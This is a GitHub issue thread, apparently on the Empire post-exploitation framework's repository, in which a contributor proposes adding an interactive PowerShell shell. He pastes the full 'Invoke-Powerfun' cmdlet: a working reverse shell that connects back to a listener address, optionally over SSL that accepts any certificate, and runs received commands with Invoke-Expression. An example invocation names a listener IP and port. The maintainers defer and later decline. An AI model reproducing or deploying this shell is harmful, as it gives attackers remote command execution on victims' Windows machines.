### ISSUE TITLE
PowerShell Shell

### ISSUE THREAD

**Issue by davehardy20** [adaptivethreat/Empire#20]
Hi Guys,

this isn't an issue more me asking a question about Empire and your plans for it.
Me and a friend wrote and got this into Metasploit; https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/
And one of the guys at Trusted Sec wrote about it too - https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/

My thoughts were that the shell might be useful inside of Empire.
The main part of the shell is really just a powershell script that Metasploit deploys as a payload.
Would this fit with your plans for Empire?

Thanks

Dave

**Comment by HarmJ0y** [comment]
Thanks for the issue- we're going to check out the arch of the shells over the next few days and see if it architecturally makes sense for Empire. Want to make sure that if we include your guy's good work it makes sense in the overall approach.

**Comment by davehardy20** [comment]
Great thanks for the reply, if you need any info or help with is and if you
decide that shells are something for Empire then I hope I can help

Dave

**Comment by davehardy20** [comment]
Hi,
I've done a little work on the Metasploit powershell 'shell' and made it into a cmdlet, so it can be incorporated into Empire more easily if you decide its something you can use.

Don't know how I can attach a file here, so have copied it into this message. 
I've also had a quick go at writing some module code for this, but am struggling with how I would get the empire listener address and port into the powershell cmdlet.
Your greater knowledge of Empire may be the answer.

Cheers

Dave

```
 # Powerfun - Written by Ben Turner & Dave Hardy
        function Invoke-Powerfun 
        { 
            Param( 
                [String]$listen,
                [String]$port,
                [String]$Command,
                [String]$Sslcon
            ) 
            Process { 
                if ($Command -eq 'reverse')
                {
                    $client = New-Object System.Net.Sockets.TCPClient($listen,$port)
                }

                $stream = $client.GetStream()

                if ($Sslcon -eq 'true') 
                {
                    $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
                    $sslStream.AuthenticateAsClient($listen) 
                    $stream = $sslStream 
                }

                [byte[]]$bytes = 0..255|%{0}
                $sendbytes = ([text.encoding]::ASCII).GetBytes('Windows PowerShell running as user ' + $env:username + ' on ' + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
                $stream.Write($sendbytes,0,$sendbytes.Length)


                $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
                $stream.Write($sendbytes,0,$sendbytes.Length)

                while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
                {
                    $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
                    $data = $EncodedText.GetString($bytes,0, $i)
                    $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )

                    $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '
                    $x = ($error[0] | Out-String)
                    $error.clear()
                    $sendback2 = $sendback2 + $x

                    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
                    $stream.Write($sendbyte,0,$sendbyte.Length)
                    $stream.Flush()  
                }
                $client.Close()
                $listener.Stop()
            }
        }
        #Invoke-Powerfun -listen $listen -port $port -Command $Command -Sslcon $Sslcon
        #Example - Invoke-Powerfun -listen 192.168.0.14 -port 5555 -Command reverse -Sslcon False
```

**Comment by enigma0x3** [comment]
Hey @davehardy20,
Sorry for the late reply...things have been super super busy :)

We definitely haven't forgotten about this. I plan on playing with your code that you have provided and will take a stab at incorporating a module and testing it to see if it makes sense for the framework. 

Thanks for your patience!

**Comment by tophertimzen** [comment]
Interactive PowerShell within Empire would be awesome. +1 to this.

**Comment by lolol123456** [comment]
Yes, +1

**Comment by Viss** [comment]
+500,000,000 :D

**Comment by enigma0x3** [comment]
An interactive shell isn't something we are looking to integrate at this moment, but if it makes sense, we might revisit. 

Thanks
